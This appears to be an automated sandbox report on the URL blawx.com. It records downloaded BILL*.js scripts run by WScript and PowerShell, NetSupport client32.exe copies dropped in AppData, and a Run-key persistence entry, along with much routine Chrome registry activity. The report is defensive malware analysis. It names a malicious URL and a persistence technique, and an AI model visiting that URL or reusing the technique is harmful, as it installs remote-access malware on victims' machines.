Analysis Overview
Threat Level: Known bad
The URL http://blawx.com was found to be: Known bad. (Chrome was launched against the URL; the actual malicious artefacts are the BILL*.js downloaders fetched from it and the NetSupport client32.exe they drop.)
Malicious Activity Summary
NetSupport
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Enumerates physical storage devices
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Script User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-24 20:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-24 20:43
Reported
2024-01-24 20:49
Platform
win10-20231215-en
Max time kernel
359s
Max time network
368s
Command Line
Signatures
NetSupport
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000\Software\Microsoft\Windows\CurrentVersion\Run\OFFICE = "C:\\Users\\Admin\\AppData\\Roaming\\DIVX911\\client32.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133506026383362281" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f44471a0359723fa74489c55595fe6b30ee0000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://blawx.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc960f9758,0x7ffc960f9768,0x7ffc960f9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=280 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2700 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2816 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3676 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4688 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4780 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4728 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL63351.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
